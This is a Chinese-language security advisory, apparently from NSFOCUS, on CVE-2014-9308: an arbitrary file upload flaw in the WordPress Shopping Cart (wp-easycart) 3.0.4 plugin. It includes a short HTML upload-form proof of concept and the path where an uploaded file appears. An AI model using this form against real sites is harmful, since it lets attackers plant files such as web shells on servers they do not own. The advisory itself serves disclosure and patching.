安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
WordPress Shopping Cart插件'banneruploaderscript.php'任意文件上传漏洞
发布日期:
2015-01-09
更新日期:
2015-01-13
受影响系统:
WordPress Shopping Cart 3.0.4
描述:
BUGTRAQ ID:
71983
CVE(CAN) ID:
CVE-2014-9308
WordPress Shopping Cart插件是购物车系统,具有电子交易功能和管理工具。
WordPress Shopping Cart 3.0.4及其他版本在实现上存在不受限制文件上传漏洞,由于banneruploaderscript.php内存在不正确的if语句,任何注册的用户都可以上传任意文件。攻击者可利用此漏洞上传任意文件到受影响计算机。
<*来源:Kacper Szurek
链接:
http://packetstormsecurity.com/files/129875/WordPress-Shopping-Cart-3.0.4-Unrestricted-File-Upload.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Kacper Szurek ()提供了如下测试方法:
Login as regular user (created using wp-login.php?action=register):
<form action="
http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
<input type="file" name="Filedata">
<input value="Upload!" type="submit">
</form>
File will be visible:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
浏览次数:
4989
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客
